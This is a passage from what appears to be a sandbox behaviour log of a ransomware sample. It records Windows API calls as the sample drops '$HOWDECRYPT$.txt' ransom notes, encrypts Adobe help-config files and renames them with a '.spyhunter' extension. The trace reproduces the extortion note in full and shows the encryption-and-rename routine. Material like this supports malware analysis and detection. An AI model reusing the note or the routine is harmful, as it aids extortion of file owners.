lpNumberOfBytesRead=0x248e334, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248e334*=0x15d, lpOverlapped=0x0) returned 1 [0179.837] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffea3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.837] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x15d, lpNumberOfBytesWritten=0x248e334, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248e334*=0x15d, lpOverlapped=0x0) returned 1 [0179.837] GetProcessHeap () returned 0x2c0000 [0179.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0179.837] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.837] WriteFile (in: hFile=0xa0, lpBuffer=0x248e374*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e334, lpOverlapped=0x0 | out: lpBuffer=0x248e374*, lpNumberOfBytesWritten=0x248e334*=0x4, lpOverlapped=0x0) returned 1 [0179.838] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e334, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e334*=0x30, lpOverlapped=0x0) returned 1 [0179.838] CloseHandle (hObject=0xa0) returned 1 [0179.838] GetProcessHeap () returned 0x2c0000 [0179.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0179.838] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\Reader_10.0.helpcfg.spyhunter") returned 89 [0179.838] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\fi_fi\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\fi_FI\\Reader_10.0.helpcfg.spyhunter" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\fi_fi\\reader_10.0.helpcfg.spyhunter")) returned 1 [0179.839] GetProcessHeap () returned 0x2c0000 [0179.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0179.839] GetProcessHeap () returned 0x2c0000 [0179.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0179.839] GetProcessHeap () returned 0x2c0000 [0179.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e749a8 | out: hHeap=0x2c0000) returned 1 [0179.839] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\eu_es\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.846] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0179.846] WriteFile (in: hFile=0xa0, lpBuffer=0x248e2ab*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e3d4, lpOverlapped=0x0 | out: lpBuffer=0x248e2ab*, lpNumberOfBytesWritten=0x248e3d4*=0x127, lpOverlapped=0x0) returned 1 [0179.847] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.848] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e3d4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e3d4*=0x2ac, lpOverlapped=0x0) returned 1 [0179.848] CloseHandle (hObject=0xa0) returned 1 [0179.848] GetProcessHeap () returned 0x2c0000 [0179.848] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e748c0 | out: hHeap=0x2c0000) returned 1 [0179.848] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e370 | out: pbBuffer=0x248e370) returned 1 [0179.848] GetProcessHeap () returned 0x2c0000 [0179.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0179.848] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e368*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e368*=0x30) returned 1 [0179.848] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\eu_es\\reader_10.0.helpcfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.849] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\Reader_10.0.helpcfg") returned 79 [0179.849] StrStrW (lpFirst="Reader_10.0.helpcfg", lpSrch=".txt") returned 0x0 [0179.849] GetProcessHeap () returned 0x2c0000 [0179.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0179.849] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e32c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248e32c*=0x15d, lpOverlapped=0x0) returned 1 [0179.850] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffea3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.850] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x15d, lpNumberOfBytesWritten=0x248e32c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248e32c*=0x15d, lpOverlapped=0x0) returned 1 [0179.850] GetProcessHeap () returned 0x2c0000 [0179.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0179.850] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.850] WriteFile (in: hFile=0xa0, lpBuffer=0x248e36c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e32c, lpOverlapped=0x0 | out: lpBuffer=0x248e36c*, lpNumberOfBytesWritten=0x248e32c*=0x4, lpOverlapped=0x0) returned 1 [0179.850] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e32c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e32c*=0x30, lpOverlapped=0x0) returned 1 [0179.850] CloseHandle (hObject=0xa0) returned 1 [0179.850] GetProcessHeap () returned 0x2c0000 [0179.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0179.851] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\Reader_10.0.helpcfg.spyhunter") returned 89 [0179.851] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\eu_es\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\eu_ES\\Reader_10.0.helpcfg.spyhunter" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\eu_es\\reader_10.0.helpcfg.spyhunter")) returned 1 [0179.851] GetProcessHeap () returned 0x2c0000 [0179.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0179.851] GetProcessHeap () returned 0x2c0000 [0179.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0179.852] GetProcessHeap () returned 0x2c0000 [0179.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e747d8 | out: hHeap=0x2c0000) returned 1 [0179.852] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\es_es\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.852] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0179.852] WriteFile (in: hFile=0xa0, lpBuffer=0x248e2a3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e3cc, lpOverlapped=0x0 | out: lpBuffer=0x248e2a3*, lpNumberOfBytesWritten=0x248e3cc*=0x127, lpOverlapped=0x0) returned 1 [0179.853] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.853] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e3cc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e3cc*=0x2ac, lpOverlapped=0x0) returned 1 [0179.853] CloseHandle (hObject=0xa0) returned 1 [0179.853] GetProcessHeap () returned 0x2c0000 [0179.853] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e746f0 | out: hHeap=0x2c0000) returned 1 [0179.853] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e368 | out: pbBuffer=0x248e368) returned 1 [0179.853] GetProcessHeap () returned 0x2c0000 [0179.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0179.854] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e360*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e360*=0x30) returned 1 [0179.854] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\es_es\\reader_10.0.helpcfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.854] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\Reader_10.0.helpcfg") returned 79 [0179.854] StrStrW (lpFirst="Reader_10.0.helpcfg", lpSrch=".txt") returned 0x0 [0179.854] GetProcessHeap () returned 0x2c0000 [0179.854] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0179.854] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e324, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248e324*=0x15d, lpOverlapped=0x0) returned 1 [0179.855] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffea3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.855] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x15d, lpNumberOfBytesWritten=0x248e324, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248e324*=0x15d, lpOverlapped=0x0) returned 1 [0179.855] GetProcessHeap () returned 0x2c0000 [0179.855] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0179.855] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.855] WriteFile (in: hFile=0xa0, lpBuffer=0x248e364*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e324, lpOverlapped=0x0 | out: lpBuffer=0x248e364*, lpNumberOfBytesWritten=0x248e324*=0x4, lpOverlapped=0x0) returned 1 [0179.855] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e324, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e324*=0x30, lpOverlapped=0x0) returned 1 [0179.856] CloseHandle (hObject=0xa0) returned 1 [0179.856] GetProcessHeap () returned 0x2c0000 [0179.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0179.856] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\Reader_10.0.helpcfg.spyhunter") returned 89 [0179.856] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\es_es\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\es_ES\\Reader_10.0.helpcfg.spyhunter" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\es_es\\reader_10.0.helpcfg.spyhunter")) returned 1 [0179.856] GetProcessHeap () returned 0x2c0000 [0179.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0179.857] GetProcessHeap () returned 0x2c0000 [0179.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0179.857] GetProcessHeap () returned 0x2c0000 [0179.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e74608 | out: hHeap=0x2c0000) returned 1 [0179.857] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\en_us\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.857] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0179.857] WriteFile (in: hFile=0xa0, lpBuffer=0x248e29b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e3c4, lpOverlapped=0x0 | out: lpBuffer=0x248e29b*, lpNumberOfBytesWritten=0x248e3c4*=0x127, lpOverlapped=0x0) returned 1 [0179.858] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.858] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e3c4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e3c4*=0x2ac, lpOverlapped=0x0) returned 1 [0179.858] CloseHandle (hObject=0xa0) returned 1 [0179.858] GetProcessHeap () returned 0x2c0000 [0179.859] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e74520 | out: hHeap=0x2c0000) returned 1 [0179.859] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e360 | out: pbBuffer=0x248e360) returned 1 [0179.859] GetProcessHeap () returned 0x2c0000 [0179.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0179.859] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x248e358*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x248e358*=0x30) returned 1 [0179.859] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\en_us\\reader_10.0.helpcfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.859] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\Reader_10.0.helpcfg") returned 79 [0179.859] StrStrW (lpFirst="Reader_10.0.helpcfg", lpSrch=".txt") returned 0x0 [0179.859] GetProcessHeap () returned 0x2c0000 [0179.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0179.859] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248e31c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248e31c*=0x158, lpOverlapped=0x0) returned 1 [0179.860] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffea8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.860] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x158, lpNumberOfBytesWritten=0x248e31c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248e31c*=0x158, lpOverlapped=0x0) returned 1 [0179.860] GetProcessHeap () returned 0x2c0000 [0179.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0179.860] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.860] WriteFile (in: hFile=0xa0, lpBuffer=0x248e35c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248e31c, lpOverlapped=0x0 | out: lpBuffer=0x248e35c*, lpNumberOfBytesWritten=0x248e31c*=0x4, lpOverlapped=0x0) returned 1 [0179.861] WriteFile (in: hFile=0xa0, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248e31c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x248e31c*=0x30, lpOverlapped=0x0) returned 1 [0179.861] CloseHandle (hObject=0xa0) returned 1 [0179.861] GetProcessHeap () returned 0x2c0000 [0179.861] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0179.861] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\Reader_10.0.helpcfg.spyhunter") returned 89 [0179.861] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\en_us\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\en_US\\Reader_10.0.helpcfg.spyhunter" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\en_us\\reader_10.0.helpcfg.spyhunter")) returned 1 [0179.862] GetProcessHeap () returned 0x2c0000 [0179.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0179.862] GetProcessHeap () returned 0x2c0000 [0179.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0179.862] GetProcessHeap () returned 0x2c0000 [0179.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e74438 | out: hHeap=0x2c0000) returned 1 [0179.862] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\de_de\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0179.862] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0179.862] WriteFile (in: hFile=0xa0, lpBuffer=0x248e293*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248e3bc, lpOverlapped=0x0 | out: lpBuffer=0x248e293*, lpNumberOfBytesWritten=0x248e3bc*=0x127, lpOverlapped=0x0) returned 1 [0179.863] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0179.863] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248e3bc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248e3bc*=0x2ac, lpOverlapped=0x0) returned 1 [0179.891] CloseHandle (hObject=0xa0) returned 1 [0179.891] GetProcessHeap () returned 0x2c0000 [0179.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e74350 | out: hHeap=0x2c0000) returned 1 [0179.891] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 